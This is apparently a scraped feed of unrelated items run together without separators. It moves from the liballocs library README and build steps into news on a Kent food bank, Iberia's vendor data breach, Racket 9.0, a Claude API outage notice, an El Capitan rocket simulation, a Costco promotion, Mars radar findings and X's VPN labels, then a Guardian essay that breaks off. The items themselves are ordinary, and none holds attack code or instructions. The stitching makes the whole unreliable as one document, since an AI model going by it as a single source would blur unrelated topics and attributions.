At 0x7ffe4e3692c8 is a stackframe-allocated object of size 128, type $2e$2ftest$2ecil$2ecmain_vaddrs_0x1436_0x154d
At 0x7ffe4e369418 is a auxv-allocated object of size 16, type __ARR2___PTR_signed_char$8
More generally, liballocs provides the following.
run-time type information
in a flexible language-agnostic in-memory format
derived from DWARF debugging information
a run-time model of memory as an allocation hierarchy
from memory mappings right down to individual variables, objects and fields
a run-time notion of allocator
capturing how each piece of memory is allocated and managed
at each level in the hierarchy!
a reflective meta-level API answering queries about arbitrary memory
type, bounds, who allocated it, etc. (a minimal sketch of such a query follows this list)
each allocator can have its own implementation of this
a uniform base-level API for manipulating memory allocations
at any level in the hierarchy
It does this extension mostly transparently. In particular,
most of the time, you don't have to change your code
... or even recompile it!
so long as you have debugging information
exception: custom allocators (alloca() is supported via compile-time instrumentation; obstacks are WIP)
for your own allocators: annotate and relink, but usually no code changes (see Documentation/custom-allocators.md)
most of the time, the slowdown is not noticeable
slowdowns I've seen are mostly under 5%...
... and these could be reduced further, to near zero (see Documentation/projects.md)
some code patterns do suffer worse slowdowns
main one: non-malloc-like custom allocators
most of the time, the memory overheads are low
I don't currently have precise measurements (soon!)
What's the purpose of all this? Unix abstractions are fairly simple and fairly general, but they are not humane, and they invite fragmentation. By 'not humane', I mean that they are error-prone and difficult to experiment with interactively. By 'fragmentation', I mean they invite building higher-level abstractions in mutually opaque and incompatible ways (think language VMs, file formats, middlewares...). To avoid these, liballocs is a minimal extension of Unix-like abstractions broadly in the spirit of Smalltalk-style dynamism, designed to counter both of these problems. It provides a foundation for features such as:
run-time type checking in C, C++ and other unsafe languages
type-checked linking, including dynamic linking
rich debugging/tracing tools with data visibility (think: better ltrace/strace)
high-level I/O abstractions over memory-mapped data (think: realloc() part of a file)
multi-language programming without foreign function interfacing APIs
flexible "live" programming
robust and efficient dynamic software update
precise garbage collection across a whole address space
efficient and flexible checkpoint/restore
seamless debugging across native, interpreted and instrumented code
snapshotting and fast startup via allocation-graph dump/reload
easy serialization of arbitrary objects
fine-grained versioning and adaptation of binary interfaces
high-level abstractions for memory-mapped I/O
hosting multiple ABIs in one process, interoperably
reliable inter-process shared-memory data structures
simplifying linking and loading mechanisms
recompilation-based dynamic optimisation of whole processes
robust object-level copy-on-write (+ tools based on it)
robust shadow memory (+ tools based on it)
orthogonal persistence
image-based development (Smalltalk-style or otherwise)
your idea here!
What's novel? Although the run-time facilities of liballocs are (I
contend) richer than what has existed before in any Unix-like system,
you might counter that many of the above goals have apparently been
achieved, at least as far as proof-of-concept, by earlier research or
development prototypes. This has been through heroic efforts of many
people... but evidently these efforts have not "stuck" in the sense of
becoming part of the fabric of a commodity distribution. When this
phenomenon repeats itself, it becomes a research problem in itself --
not simply a matter of tech transfer or follow-through. Many of the
resulting prototypes lack features required for real-world use --
awareness of custom memory allocators is a common lack -- and generally
they are realised in mutually incompatible ways, for want of the right
abstractions.
To borrow Greenspun's tenth rule, this is because each of these earlier
prototypes contains an ad-hoc, bug-ridden and slow implementation of a
small fraction of liballocs. The goal of liballocs is to offer a
flexible, pluralist structure for growing these features on -- in a way
that transparently adds these capabilities to existing codebases, rather
than requiring up-front "buy-in". It's not a framework; you don't
usually write code against its API, or port your code to it. Instead, it
extends the fabric which already builds and runs your code. The research
programme around liballocs is working towards demonstrating the
practicality of this approach, by building instances of several of the
above systems/services, at modest effort and capable of co-existence.
One idea behind liballocs is to adopt some of the same design heuristics
to which Unix owes its success: minimalism, flexibility and pluralism.
Instead of defining a single "virtual machine" from the top down, it
permits many possible realisations of the same or similar abstractions.
Unix's free-form byte-oriented facilities allow many higher-level
semantic constructs to coexist (programming languages, structured data,
network protocols and so on). Unlike Unix, liballocs also tries fairly
hard to recognise and reconcile these duplicates after the fact. That
requires a metasystem that is descriptive rather than prescriptive. A few abstractions (allocators, 'types' as data layout descriptions, and interpreters) allow reconciling commonalities across many distinct pre-existing concretions: ways in which memory can be managed, data organised, and meanings interpreted. These core abstractions form a
platform for higher-level services that can be made to operate across
multiple ABIs, language runtimes, libraries, coding styles and so on.
There is both a toolchain component and a run-time component. The
run-time is what actually offers the services, and is in this repository.
For this to work reliably, compilation toolchains must be lightly
subverted, but this mostly occurs below the level of user code -- at link
time, by influencing compiler options, and sometimes by light
instrumentation; the basics of this are found in the toolsub repository, which is usable independently of liballocs. Similarly, a minimal core runtime, which reflects roughly at the ELF level but does not know about allocators or types, is in the librunt repository, and liballocs directly extends it.
You can read more about the system in a research paper from Onward! 2015 (http://www.cl.cam.ac.uk/~srk31/#onward15), which explains how liballocs generalises existing debugging infrastructure, the contrast with VM-style debug servers, and the Unix-style descriptive debugging which liballocs adopts and extends. The polyglot aspects of liballocs were discussed in my talk at Strange Loop 2014 (http://www.youtube.com/watch?v=LwicN2u6Dro). Another paper is rather overdue, to describe the more mature architecture that now exists.
For full disclosure, here are some additional current limitations that
will eventually go away.
works on GNU/Linux only (some FreeBSD code exists...)
when code does need to be recompiled, the toolchain is a bit slow
it is a little fragile to churn (e.g. glibc or
Linux kernel changes can break it)
reflection is only as good as the available debugging information (or other ground-truth metadata).
So, for example, if you want to find out where all the pointers
are on your stack, you need the compiler's help --
and today's compilers only keep a very partial record of this.
Similarly, if you want to reflect on C preprocessor macros,
you'll need some source of that metadata, which standard debuginfo
builds usually omit.
To build this software on a Debian-based GNU/Linux distribution,
please see the .circleci/ and buildtest/ directories. The former
shows the actively tested build recipe, and the latter has a number
of Dockerfiles for doing testable, (mostly) reproducible builds from
a bare-bones start on the given distributions. You should be able to
adapt the RUN commands fairly easily to do your build. If you find
any problems doing these builds ("docker build buildtest/xxx") please
report them. If there is no buildtest Dockerfile for your
distribution, pick the "closest" one but then you'll need to figure
out any necessary changes for yourself. Ideally, please contribute a
Dockerfile once you've done this. Thanks to Manuel Rigger for
contributing the initial Ubuntu 18.04 one.
Note also there are submodules at many levels in this git repo,
including nested submodules. You will naturally end up pulling them
all if you follow one of the buildtest recipes or the instructions
below. The following diagram shows the structure (generated by this script; view the SVG proper for useful mouseover labels explaining what each subrepo contains).
Generic download-and-build instructions for Debian platforms
look something like the following.
... where you should tune "-j4" according to your needs. After building, you will also want to set up space to hold metadata files, and build the metadata for your C library binary. (This is slow because libdwarf calls malloc() far, far too often.)
$ cd ..
$ export LIBALLOCS=`pwd`/liballocs
$ sudo mkdir /usr/lib/meta # metadata will live here
$ sudo chown root:staff /usr/lib/meta
$ sudo chmod g+w /usr/lib/meta
$ make -f "$LIBALLOCS"/tools/Makefile.meta \
/usr/lib/meta$( readlink -f /lib/x86_64-linux-gnu/libc.so.6 )-meta.so
If you've got this far, you may as well run the tests.
$ cd liballocs/tests
$ make -k # please report failures
“I’ve sat and cried many times, feeling like I’ve let my kids down,” is the heartbreaking description one Kent mother gives of the difficulty she has meeting her family’s needs.
With four children still under 13, the family live in a rented flat in the town of Herne Bay on the county’s north coast. She does not come to the door, but her partner passes a handwritten note relaying their meagre existence on benefits as the Guardian joins the local food bank’s morning delivery round.
“I have to be careful with electric and gas, and food has to be £1 frozen food,” she writes. “Snacks are a very rare treat. If it wasn’t for the
Canterbury food bank
we would have nothing but pasta.
“At Christmas my children will have small stuff and that will mean less money on food, more stress and worry.”
The charity is in the frontline of an ongoing cost of living crisis that Rachel Reeves has promised to tackle in her budget next week
with measures to slow price rises
.
In 2019, the food bank, based on an industrial unit in nearby Whitstable, was giving out 450 parcels a month. Now, a typical month involves well over 1,100 parcels, sometimes in excess of 1,400. The quantity of food going out of the door puts the charity, which covers Canterbury, Whitstable and Herne Bay, in the top 5% of food banks in the country.
When these kinds of services were first established in the UK after the 2008-09 financial crisis, most people thought they would outlive their usefulness within two or three years. But on what is the Guardian’s third visit to the food bank in four years, this one shows no sign of reaching its use-by date.
In February 2022, the charity had gone from spending virtually nothing on food (as donations matched demand) to about £3,000 a month as the Covid crisis segued into a cost of living crisis. When we returned the following year, its monthly food bill was £7,000. Today it is £10,000.
It receives generous support locally, with food donations rising and coming in at between 1,100 and 1,400kg a month. But demand is up 15% year on year, with the charity using cash donations and grant money to cover its bills. Meanwhile, rising food prices mean every pound buys less than it used to.
This week’s figures from the Office for National Statistics showed UK inflation
eased back to 3.6%
in October. However, a deeper dive highlights the pressure on families, as rising prices for bread, cereals, meat and vegetables drove up the annual rate of food and drink price rises to 4.9%, from 4.5% the previous month.
Since 2019, Whitstable food bank has increased its food parcels from 450 a month to more than 1,100.
Photograph: Teri Pengilley/The Guardian
“Every pound we spend buys around 10% less food than it did a year and a half ago,” says Stuart Jaenicke, the charity’s head of finance.
The cost of its shopping basket has risen by about 11% in that time, he says, pointing to sharp increases on items such as teabags, hot chocolate and coffee.
An end to the policy – which means parents can claim universal credit or tax credits only for their first two children – would mean “my children would be able to have more of the things they need”, continues the Herne Bay mother.
Her partner’s mental illnesses prevent him working and she is also unable to work because the special educational needs of two of the children mean “constant calls to go to school”.
The chief executive of Child Poverty Action Group, Alison Garnham, says getting rid of
the cap
is the “right thing to do”. A reversal would instantly lift 350,000 children out of poverty and lessen the hardship experienced by another 700,000, she says, adding: “Removing this invidious policy would mean millions more children get the fair start in life they deserve.”
It is on the “financial side” that the food bank is feeling the greatest pressure as even its regular donors feel more hard-up.
“Even when headline inflation falls, supermarket prices don’t go back down – they stay high,” says Jaenicke. “We’re paying the same as everyone else.
Food banks have become ‘a necessary part of the welfare state’, says one social policy researcher.
Photograph: Teri Pengilley/The Guardian
“Monetary donations from the public have fallen sharply – down more than £80,000 over the past two years if current trends continue – and grants have become much more competitive and much less predictable,” he adds.
This year the charity has received about 60% of the income it expected but is fortunate in that it could keep going for a year on its financial reserves.
“So we’re in a position where demand is up, food prices are up, donations are down, and funding is volatile,” he says. “And behind those numbers are real households: more working families, more single parents, more older people, and more people asking for no-cook items because they can’t afford energy.
“This isn’t an emergency spike any more. It’s become the new normal.”
According to the 2025 indices of deprivation, Canterbury is an average place, finishing mid-table in the list of 296 local authority districts, says Peter Taylor-Gooby, research professor of social policy at the University of Kent, who is one of the charity’s trustees.
The problems locals face are not uncommon in seaside towns, he says. “It’s got a lot of tourism, a bit of retail and the kinds of jobs you get are insecure and low-paid.”
With three universities in nearby Canterbury there is also a large, cheap labour pool that depresses wages, although increasingly students too are turning to the food bank for help.
“In the Canterbury area, poverty is becoming deeper and more concentrated, as it is in the country as a whole,” says Taylor-Gooby, who attributes this to benefits and wages failing to keep pace with rising living costs.
With seemingly no light at the end of the tunnel, the populism of
Reform UK
has resonated with voters. It took control of Kent county council in May, although
a recording
of a recent internal meeting published by the Guardian revealed bitter divisions as it strained against the financial realities of the job.
A volunteer at Whitstable food bank.
Photograph: Teri Pengilley/The Guardian
“There’s a byelection for the local council in my ward and talking to people you get a sense that ‘nobody has never done anything for us’,” says Taylor-Gooby.
On the second floor of the small business unit there is a bank of desks where the staff calmly deal with requests for help from sometimes overwrought
callers.
The most common issue is the cost of living, says Maria. “Prices for food, fuel, and rent keep rising, but wages and benefits just aren’t keeping up. Many people have unpredictable hours or zero-hours contracts, so one quiet week at work can mean an empty fridge.”
Her colleague Julia chips in that “any buffer or rainy-day fund is long gone”, so unexpected expenses like children’s clothes or a parking fine can leave people in dire straits.
At a time when many Britons are contemplating buying Advent calendars filled with everything from marshmallows to gin miniatures, on the wall a poster advertises a “reverse Advent calendar”. The campaign suggests adding an item a day – from baked beans to mince pies and shampoo – to a bag for life, then donating it.
Liam Waghorn, the operations manager, explains that it has to “work harder” for donations as there is more competition. “We have to go and find donations rather than expect them.” Technology helps. One new aid is the
BanktheFood
app, which sends supporters alerts about products in short supply.
On each Guardian visit, the food bank – originally a community project run by local churches – is slicker and more businesslike. Screens have replaced pens and papers at picking stations, thanks to the IT wizardry of one of the retired volunteers, giving real-time information as parcel requests are logged.
Waghorn proudly relays that it has been able to add fresh food, such as bread and eggs, to its parcels to make them more nutritious. It has also sped up the service to next-day delivery.
With poverty more widespread, food banks have necessarily become larger and more professional, says Taylor-Gooby. “Once the goal of food banks was to work themselves out of a job. Now they have become a necessary part of the welfare state.”
Iberia discloses customer data leak after vendor security breach
Bleeping Computer
www.bleepingcomputer.com
2025-11-23 13:46:25
Spanish flag carrier Iberia has begun notifying customers of a data security incident stemming from a compromise at one of its suppliers. The disclosure comes days after a threat actor claimed on hacker forums to have access to 77 GB of data allegedly stolen from the airline. [...]...
Spanish flag carrier Iberia has begun notifying customers of a data security incident stemming from a compromise at one of its suppliers.
The disclosure comes days after a threat actor claimed on hacker forums to have access to 77 GB of data allegedly stolen from the airline.
Customer data affected
Iberia, Spain's largest airline and part of IAG (International Airlines Group), says unauthorized access to a supplier's systems resulted in the exposure of certain customer information.
According to an
email seen by
threat intelligence platform Hackmanac, the compromised data may include:
Customer's name and surname
Email address
Loyalty card (Iberia Club) identification number
The airline says customers' Iberia account login credentials and passwords were not compromised, nor was any banking or payment card information accessed.
Iberia notice of security incident emailed to customers
(Hackmanac on X)
"As soon as we became aware of the incident, we activated our security protocol and procedures and implemented all necessary technical and organizational measures to contain it, mitigate its effects, and prevent its recurrence," states the security notice mailed out in Spanish.
Iberia says it has added additional protections around the email address linked to customer accounts, now requiring a verification code before any changes can be made.
The airline is also monitoring its systems for suspicious activity. Relevant authorities have been notified, and the investigation remains ongoing in coordination with the involved supplier.
"As of the date of this communication, we have no evidence of any fraudulent use of this data. In any case, we recommend that you pay attention to any suspicious communications you may receive to avoid any potential problems they may cause. We encourage you to report any anomalous or suspicious activity you detect to our call center by calling the following telephone number: +34 900111500," continues the email.
Disclosure follows data theft claims
The timing of the disclosure is noteworthy, as it follows a claim made roughly a week ago by a threat actor online that they had access to 77 GB of purported Iberia data and were attempting to sell it for $150,000.
In the
forum post
(shown below), the threat actor claimed the trove was "extracted directly from [the airline's] internal servers" and contained A320/A321 technical data, AMP maintenance files, engine information, and other internal documents:
Threat actor claiming to sell purported Iberia data last week (
Hackmanac on X)
It's not clear whether the purported data dump is related to Iberia's incident, as the listing does not mention the customer information Iberia says was exposed. Furthermore, the airline attributes the breach to a third-party vendor rather than its own servers.
BleepingComputer has not verified the authenticity of the data advertised online. We have approached Iberia's press team with further questions and will update this article once we hear back.
In the meantime, Iberia customers and partners should remain cautious of any unsolicited or suspicious messages claiming to come from the airline, as these may be phishing or social engineering attempts.
Tosijs-schema is a super lightweight schema-first LLM-native JSON schema library
A major release is always exciting, and Racket 9.0 is no exception: it introduces Parallel Threads. While Racket has had green threads for some time, and supports parallelism via futures and places, we feel parallel threads are a major addition.
Parallel threads can be created using the #:pool argument to thread creation. Threads created with #:keep set to 'results will record their results for later retrieval with thread-wait. The black-box wrapper prevents the optimizing compiler from optimizing away certain computations entirely. This can be helpful in ensuring that benchmarks are accurate.
There are many other repairs and documentation improvements!
Thank you
The following people contributed to this release:
Alexander Shopov, Anthony Carrico, Bert De Ketelaere, Bogdan Popa, Cadence Ember, David Van Horn, Gustavo Massaccesi, Jade Sailor, Jakub Zalewski, Jens Axel Søgaard, jestarray, John Clements, Jordan Johnson, Matthew Flatt, Matthias Felleisen, Mike Sperber, Philip McGrath, RMOlive, Robby Findler, Ruifeng Xie, Ryan Culpepper, Sam Phillips, Sam Tobin-Hochstadt, Sebastian Rakel, shenleban tongying, Shu-Hung You, Stephen De Gabrielle, Steve Byan, and Wing Hei Chan.
Racket
is a community developed open source project and we welcome new contributors. See
racket/README.md
to learn how you can be a part of this amazing project.
Feedback Welcome
Questions and discussion welcome at the Racket community on
Discourse
or
Discord
.
If you can, please help get the word out to users and platform-specific repo packagers.
Racket - the Language-Oriented Programming Language - version 9.0 is now available from https://download.racket-lang.org
See https://blog.racket-lang.org/2025/11/racket-v9-0.html for the release announcement and highlights.
A fix has been implemented and we are monitoring the results.
Posted Nov 23, 2025 - 13:53 UTC
Update
We are continuing to investigate this issue.
Posted Nov 23, 2025 - 13:06 UTC
Investigating
We are currently investigating reports of the Claude API experiencing higher than normal failure rates. Our team is actively working to identify the root cause.
Posted Nov 23, 2025 - 13:05 UTC
This incident affected: Claude API (api.anthropic.com).
Gordon Bell finalist team pushes scale of rocket simulation on El Capitan
Researchers used Lawrence Livermore National Laboratory’s (LLNL) exascale supercomputer El Capitan to perform the largest fluid dynamics simulation ever — surpassing one quadrillion degrees of freedom in a single computational fluid dynamics (CFD) problem. The team focused the effort on rocket–rocket plume interactions.
El Capitan is funded by the National Nuclear Security Administration’s (NNSA) Advanced Simulation and Computing (ASC) program. The work — in part performed prior to the transition of the world’s most powerful supercomputer to classified operations earlier this year — is led by researchers from Georgia Tech and supported by partners at AMD, NVIDIA, HPE, Oak Ridge National Laboratory (ORNL) and New York University’s (NYU) Courant Institute.
The
paper
is a finalist for the 2025 ACM Gordon Bell Prize, the highest honor in high-performance computing. This year’s winner
— selected from a small handful of finalists — will be announced at the International Conference for High Performance Computing, Networking, Storage, and Analysis (SC25) in St. Louis on Nov. 20.
To tackle the extreme challenge of simulating the turbulent exhaust flow generated by many rocket engines firing simultaneously, the team’s approach centered on a newly proposed shock-regularization technique called Information Geometric Regularization (IGR), invented and implemented by professors Spencer Bryngelson of Georgia Tech and Florian Schäfer of NYU Courant, together with Ruijia Cao (now a Cornell Ph.D. student).
Using all 11,136 nodes and more than 44,500 AMD Instinct MI300A Accelerated Processing Units (APUs) on El Capitan, the team achieved better than 500 trillion grid points, or 500 quadrillion degrees of freedom. They further extended this to ORNL’s Frontier, surpassing one quadrillion degrees of freedom. The simulations were conducted with
MFC
, a permissively licensed open-source code maintained by Bryngelson’s group. With these simulations, they represented the full exhaust dynamics of a complex configuration inspired by SpaceX’s Super Heavy booster.
The simulation sets a new benchmark for exascale CFD performance and memory efficiency. It also paves the way for computation-driven rocket design, replacing costly and limited physical experiments with predictive modeling at unprecedented resolution, according to the team.
Georgia Tech’s Bryngelson, the project’s lead, said the team used specialized techniques to make efficient use of El Cap’s architecture.
“In my view, this is an intriguing and marked advance in the fluid dynamics field,” Bryngelson said. “The method is faster and simpler, uses less energy on El Capitan, and can simulate much larger problems than prior state-of-the-art
— orders of magnitude larger.”
The team accessed El Capitan via prior collaborations with LLNL researchers and worked with LLNL’s El Capitan Center of Excellence and HPE to use the machine on the classified network. LLNL facilitated the effort as part of system-scale stress testing ahead of El Capitan's classified deployment, serving as a public example of the full capabilities of the system before it was turned over for classified use in support of the NNSA’s core mission of stockpile stewardship.
“We supported this work primarily to evaluate El Capitan’s scalability and system readiness,” said Livermore Computing’s Development Environment Group Leader Scott Futral. “The biggest benefit to the ASC program was uncovering system software and hardware issues that only appear when the full machine is exercised. Addressing those challenges was critical to operational readiness.”
While the actual compute time was relatively short, the bulk of the effort focused on debugging and resolving issues that emerged at full system scale. Futral added that internal LLNL teams, including those working on tsunami early warning and inertial confinement fusion, have also conducted full-system science demonstrations on El Capitan — efforts that reflect the Lab’s broader commitment to mission-relevant exascale computing.
A next-generation challenge solved with next-generation hardware
As private-sector spaceflight expands, launch vehicles increasingly rely on arrays of compact, high-thrust engines rather than a few massive boosters. This design provides manufacturing advantages, engine redundancy and easier transport, but also creates new challenges. When dozens of engines fire together, their plumes interact in complex ways that can drive searing hot gases back toward the vehicle’s base, threatening mission success, researchers said.
The solution depends on understanding how those plumes behave across a wide range of conditions. While wind tunnel experiments can test some of the physics, only large-scale simulation can see the full picture at high resolution and under changing atmospheric conditions, engine failures or trajectory shifts. Until now, such simulations were too costly and memory-intensive to run at meaningful scales, especially in an era of multi-rocket boosters, according to the team.
To break that barrier, the researchers replaced traditional “shock capturing” methods — which struggle with high computational cost and complex flow configurations — with their IGR approach, which reformulates how shock waves are treated in the simulation, enabling a non-diffusive treatment of the same phenomenon. With IGR, more stable results can be computed more efficiently.
With IGR in place, the team focused on scale and speed. Their optimized solver took advantage of El Capitan’s unified memory APU design and leveraged mixed-precision storage via AMD’s new Flang-based compiler to pack more than 100 trillion grid cells into memory without performance degradation.
The result was a full-resolution CFD simulation that ran across El Capitan’s full system — roughly 20 times larger than the previous record for this class of problem. The simulation tracked the Mach 10 exhaust of 33 rocket engines, capturing the moment-to-moment evolution of plume interactions and heat-recirculation effects in fine detail.
At the heart of the study was El Capitan’s unique hardware architecture, which is equipped with four AMD MI300A APUs per node — each combining CPU and GPU chips that access the same physical memory. For CFD problems that simultaneously demand high memory capacity and performant computation, that design proved essential, and it avoided the penalties of the software unified-memory strategies that separate-memory systems require.
The team conducted scaling tests on multiple systems, including ORNL’s Frontier and the Swiss National Supercomputing Centre’s Alps. Only El Capitan supports a physically shared memory architecture. The system’s unified CPU–GPU memory, based on AMD’s MI300A architecture, allowed the entire dataset to reside in a single addressable memory space, eliminating data transfer overhead and enabling larger problem sizes.
“We needed El Capitan because no other machine in the world could run a problem of this size at full resolution without compromises,” said Bryngelson. “The MI300A architecture gave us unified memory with zero performance penalty, so we could store all our simulation data in a single memory space accessible by both CPU and GPU. That eliminated overhead, cut down the memory footprint and let us scale across the full system. El Capitan didn’t just make this work possible; it made it efficient.”
The researchers also achieved an 80-fold speedup over previous methods, reduced memory footprint by a factor of 25 and cut energy-to-solution by more than five times. By combining algorithmic efficiency with El Capitan’s chip design, they showed that simulations of this size can be completed in hours, not weeks.
Implications for spaceflight and beyond
While the simulation focused on rocket exhaust, the underlying method applies to a wide range of high-speed compressible flow problems — from aircraft noise prediction to biomedical fluid dynamics, the researchers said. The ability to simulate such flows without introducing artificial viscosity or sacrificing resolution could transform modeling across multiple domains and highlights a key design principle behind El Capitan: pairing breakthrough hardware with real-world scientific impact.
“From day one, we designed El Capitan to enable mission-scale simulations that were not previously feasible,” said Bronis R. de Supinski, chief technology officer for Livermore Computing. “We’re always interested in projects that help validate performance and scientific usability at scale. This demonstration provided insight into El Capitan’s behavior under real system stress. While we’re supporting multiple efforts internally — including our own Gordon Bell submission — this was a valuable opportunity to collaborate and learn from an external team with a proven code.”
New Costco Gold Star Members also get a $40 Digital Costco Shop Card*
Bleeping Computer
www.bleepingcomputer.com
2025-11-23 13:09:17
The holidays can be hard on any budget, but there may be a way to make it a little easier. Instead of dashing through the snow all around town, get all your shopping done under one roof at Costco. Right now, you can even get a 1-Year Costco Gold Star Membership plus a $40 Digital Costco Shop Card*, ...
The holidays can be hard on any budget, but there may be a way to make it a little easier. Instead of dashing through the snow all around town, get all your shopping done under one roof at Costco. Right now, you can even get a
1-Year Costco Gold Star Membership
plus a $40 Digital Costco Shop Card*, and it’s still only $65.
Shop at Costco for the holidays
Here’s how to get your Gold Star Membership and your Digital Costco Shop Card*. First, make sure to provide a valid email address when you make your purchase here. Within two weeks, you’ll be emailed your Digital Costco Shop Card*, which you can use online or in-store.
This offer is only available to new Costco members or former members who have let their Costco membership lapse for 18 months or longer.
Once you’re in the door, you can check out fresh-baked goods, load up on bulk groceries to cut back on repeat trips, or stock up on all the little home essentials like paper towels that seem to disappear the moment family is through the door.
Be sure to also look at the offerings on Costco.com to find everything from options for ordering your groceries or even planning a vacation. Your next trip might be through one of Costco’s exciting vacation packages.
Don’t forget to stop by the Costco food court on your way out for something hot, quick, and delicious. The hot dog meals are still only $1.50.
Here’s your chance to give your budget a little holiday treat.
*To receive a Digital Costco Shop Card, you must provide a valid email address and set up auto renewal of your Costco membership on a Visa® credit/debit card or Mastercard debit card at the time of sign-up. If you elect not to enroll in auto renewal at the time of sign-up, incentives will not be owed. Valid only for new members and those whose memberships (Primary and Affiliate) have been expired for at least 18 months. Valid only for nonmembers for their first year of membership. Not valid for upgrade or renewal of an existing membership. Promotion may not be combined with any other promotion. Costco employees are not eligible for new member promotions. Digital Costco Shop Card will be emailed to the email address provided by the Primary Member at time of sign-up within 2 weeks after successful sign-up and enrollment in auto renewal. Digital Costco Shop Card is not redeemable for cash, except as required by law. Costco is not liable for incentives not received due to entry of an invalid address during sign-up. Digital Costco Shop Cards are not accepted at the U.S. or Canada Food Court. Neither Costco Wholesale Corporation nor its affiliates are responsible for use of the card without your permission. Use the provided single-use promo code when entering your payment information. A Costco Gold Star Membership is $65 a year. An Executive Membership is an additional $65 upgrade fee a year. Each membership includes one free Affiliate Card. May be subject to sales tax. Costco accepts all Visa cards, as well as cash, checks, debit/ATM cards, EBT and Costco Shop Cards. Departments and product selection may vary. Offer expires 12/31/2025.
Disclosure: This is a StackCommerce deal in partnership with BleepingComputer.com. In order to participate in this deal or giveaway you are required to register an account in our StackCommerce store. To learn more about how StackCommerce handles your registration information please see the
StackCommerce Privacy Policy
. Furthermore, BleepingComputer.com earns a commission for every sale made through StackCommerce.
A highly reflective area over the base of the Martian south pole suggested the potential presence of liquid water. But new radar measurements suggest there may be another explanation. Credit: ESA/DLR/FU Berlin, CC BY-SA 3.0 IGO
Ancient Mars boasted abundant water, but the cold and dry conditions of today make liquid water on the Red Planet seem far less probable. However, the Mars Advanced Radar for Subsurface and Ionosphere Sounding (MARSIS)
detected
strong radar reflections from a 20-kilometer-wide area over the base of Mars's southern polar ice cap, hinting at the possibility of liquid water below the icy surface. Such a finding would have major implications for the planet's possible habitability.
But sustaining liquid water underneath the ice might not be feasible without very salty brines or localized volcanic heat. Scientists have deliberated about other possible "dry" explanations for the bright reflections detected by MARSIS, such as layers of carbon dioxide and water ices or salty ice and clay causing elevated radar reflectivity.
Aboard the Mars Reconnaissance Orbiter, the Shallow Radar (SHARAD) uses higher frequencies than MARSIS. Until recently, though, SHARAD's signals couldn't reach deep enough into Mars to bounce off the base layer of the ice where the potential water lies—meaning its results couldn't be compared with those from MARSIS.
However, the Mars Reconnaissance Orbiter team recently tested a new maneuver that rolls the spacecraft on its flight axis by 120°—whereas it previously could roll only
up to 28°
. The new maneuver, termed a "very large roll," or VLR, can increase SHARAD's signal strength and penetration depth, allowing researchers to examine the base of the ice in the enigmatic high-reflectivity zone.
Gareth Morgan and colleagues, for their article published in Geophysical Research Letters, examined 91 SHARAD observations that crossed the high-reflectivity zone. Only when using the VLR maneuver was a SHARAD basal echo detected at the site. In contrast to the MARSIS detection, the SHARAD detection was very weak, meaning it is unlikely that liquid water is present in the high-reflectivity zone.
The researchers suggest that the faint detection returned by SHARAD under this portion of the ice cap is likely due to a localized region of smooth ground beneath the ice. They add that further research is needed to reconcile the differences between the MARSIS and SHARAD findings.
More information: Gareth A. Morgan et al, High Frequency Radar Perspective of Putative Subglacial Liquid Water on Mars, Geophysical Research Letters (2025). DOI: 10.1029/2025gl118537
Provided by Eos. This story is republished courtesy of Eos, hosted by the American Geophysical Union. Read the original story here.
Citation: Maybe that's not liquid water on Mars after all (2025, November 21), retrieved 23 November 2025 from https://phys.org/news/2025-11-liquid-mars.html
X.com Is Gonna Snitch You Out to the Public If You Use a VPN
Regular folks use virtual private networks (VPNs) to keep themselves safe from online data thieves, hackers, snoops, and crooks. Those who live, work, or travel in countries with oppressive human rights records rely upon them not to get thrown in jail (or worse). Journalists and activists, likewise, depend on VPNs to keep them safe from the prying eyes of those who’d harm them.
Now it looks like people who use a VPN to connect to X will get warning text shown on their profiles. It was hinted at by X last month, but we’re starting to see more evidence that it’s actually set to happen.
what it’ll look like
“When you read content on X, you should be able to verify its authenticity. This is critical to getting a pulse on important issues happening in the world,”
posted
Nikita Bier, Head of Product at X, back on October 14, 2025.
“As part of that, we’re experimenting with displaying new information on profiles, including which country an account is based, among other details. Starting next week, we will surface this on a handful of profiles of X team members to get feedback.”
Online security advocates immediately criticized the news, saying that it was a thinly veiled move to out those who use VPNs, which protect online anonymity by routing internet traffic through a third-party server as a middleman. VPNs are widely available to private citizens in most countries in the world, including the US, where X is based.
“Can users choose to opt out? (It) has potential privacy implications,” asked a user, to which Bier replied, “
There will be privacy toggles. However, if a user configures them, that will likely be highlighted on their profile. More to come.”
Well, we got more details, and it sure looks like X is outing those who use VPNs. “X will show a warning on your account if you try to use a VPN to hide where your account is from when the upcoming ‘About Your Account’ feature launches,” Aaron Perris, an analyst over at
MacRumors,
posted on X.com
on November 15, 2025.
The post accompanied a chunk of (ostensibly X.com’s) code showing the text it’ll display on your X profile to other X users: “‘One of our partners has indicated that you may be connecting via a proxy—such as a VPN—which may change the country or region that is displayed on your profile.’ Your profile will display ‘Country or region may not be accurate’ to other users.”
It’s a shitty move on X’s part. If X really wanted to keep its users safe, it would do something about the severity, depth, and breadth of misinformation that it allows on its platform. But hey, they can monetize that, so I wouldn’t hold my breath.
Shaders: How to draw high fidelity graphics with just x and y coordinates
Has Britain become an economic colony?
Guardian
www.theguardian.com
2025-11-23 12:00:10
The UK could’ve been a true tech leader – but it has cheerfully submitted to US dominance in a way that may cost it dear Two and a half centuries ago, the American colonies launched a violent protest against British rule, triggered by parliament’s imposition of a monopoly on the sale of tea and the ...
Two and a half centuries ago, the American colonies launched a violent protest against British rule, triggered by parliament’s imposition of a monopoly on the sale of tea and the antics of a vainglorious king. Today, the tables have turned: it is Great Britain that finds itself at the mercy of major US tech firms – so huge and dominant that they constitute monopolies in their fields – as well as the whims of an erratic president. Yet, to the outside observer, Britain seems curiously at ease with this arrangement – at times even eager to subsidise its own economic dependence. Britain is hardly alone in submitting to the power of American firms, but it offers a clear case study in why nations need to develop a coordinated response to the rise of these hegemonic companies.
The current age of American tech monopoly began in the 2000s, when the UK, like many other countries, became almost entirely dependent on a small number of US platforms – Google, Facebook, Amazon and a handful of others. It was a time of optimism about the internet as a democratising force, characterised by the belief that these platforms would make everyone rich. The dream of the 1990s – naive but appealing – was that anyone with a hobby or talent could go online and make a living from it.
US tech dominance wasn’t the result of a single policy decision. Yet it was still a choice that countries made – as is highlighted by China’s decision to block foreign sites and build its own. While that move was far easier under an authoritarian system, it also amounted to an industrial policy – one that left China as the only other major economy with its own full digital ecosystem.
